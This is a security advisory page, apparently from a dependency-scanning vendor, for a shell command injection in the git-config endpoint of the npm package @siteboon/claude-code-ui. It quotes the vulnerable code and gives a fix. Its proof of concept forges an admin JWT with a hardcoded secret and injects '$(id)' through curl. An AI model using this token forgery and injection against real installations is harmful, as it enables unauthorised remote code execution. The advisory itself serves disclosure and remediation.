Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-7fv4-fmmc-86g2

@siteboon/claude-code-ui is Vulnerable to Shell Command Injection in Git Routes

Also known asCVE-2026-31861
Published
Mar 10, 2026
Updated
Mar 13, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
6.0%probability of exploitation in next 30 days
Lower Risk92th percentile+5.96%
0.00%2.61%5.22%7.83%0.1%0.1%0.1%6.0%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

@siteboon/claude-code-uinpm
477downloads / week

Description

Shell Command Injection in User Git Config Endpoint

FieldValue
SeverityHigh
CVSS 3.18.8 (High) — when chained with VULN-01
CWECWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Attack VectorNetwork
AuthenticationJWT required (bypassable via VULN-01)
Affected Filesserver/routes/user.js (lines 58-59)

Description

The /api/user/git-config endpoint constructs shell commands by interpolating user-supplied gitName and gitEmail values into command strings passed to child_process.exec(). The input is placed within double quotes and only " is escaped, but backticks (`), $() command substitution, and \ sequences are all interpreted within double-quoted strings in bash.

This allows authenticated attackers to execute arbitrary OS commands via the git configuration endpoint.

Root Cause

server/routes/user.js lines 58-59:

await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`);
await execAsync(`git config --global user.email "${gitEmail.replace(/"/g, '\\"')}"`);

Only " is escaped. However, within double-quoted bash strings, the following are still interpreted:

  • `malicious_command` — backtick execution
  • $(malicious_command) — subshell execution

Impact

  • Remote Code Execution (RCE) — arbitrary OS commands execute as the Node.js process user
  • The git config --global vector modifies the server-wide git configuration, affecting all git operations
  • When chained with VULN-01 (hardcoded JWT), this is fully unauthenticated RCE
  • Attacker can: read/write any file, install backdoors, pivot to other systems, exfiltrate data

Proof of Concept

# Step 1: Forge a JWT (see VULN-01)
TOKEN=$(python3 -c "import jwt; print(jwt.encode({'userId':1,'username':'admin'}, 'claude-ui-dev-secret-change-in-production', algorithm='HS256'))")

# Step 2: Inject via gitName using command substitution
curl -X POST "http://REDACTED:5173/api/user/git-config" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"gitName":"$(id)","gitEmail":"[email protected]"}'

The server executes:

git config --global user.name "$(id)"

Bash evaluates $(id) before passing it to git, executing the id command and setting the username to the output.

Remediation

Replace exec() with spawn() (array arguments, no shell):

// BEFORE (vulnerable):
await execAsync(`git config --global user.name "${gitName.replace(/"/g, '\\"')}"`);

// AFTER (safe):
await spawnAsync('git', ['config', '--global', 'user.name', gitName]);
await spawnAsync('git', ['config', '--global', 'user.email', gitEmail]);

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@siteboon/claude-code-uiall versions1.24.0

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @siteboon/claude-code-ui. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @siteboon/claude-code-ui to 1.24.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7fv4-fmmc-86g2 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-7fv4-fmmc-86g2 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7fv4-fmmc-86g2. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

# Shell Command Injection in User Git Config Endpoint | Field | Value | |-------|-------| | **Severity** | High | | **CVSS 3.1** | 8.8 (High) — when chained with VULN-01 | | **CWE** | CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') | | **Attack Vector** | Network | | **Authentication** | JWT required (bypassable via VULN-01) | | **Affected Files** | `server/routes/user.js` (lines 58-59) | ## Description The `/api/user/git-config` endpoint constructs shell commands by interpolating user-supplied `gitName` and `gitEmail` values into command s
O3 Security · Impact-Aware SCA

Is GHSA-7fv4-fmmc-86g2 in your dependencies?

O3 detects GHSA-7fv4-fmmc-86g2 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works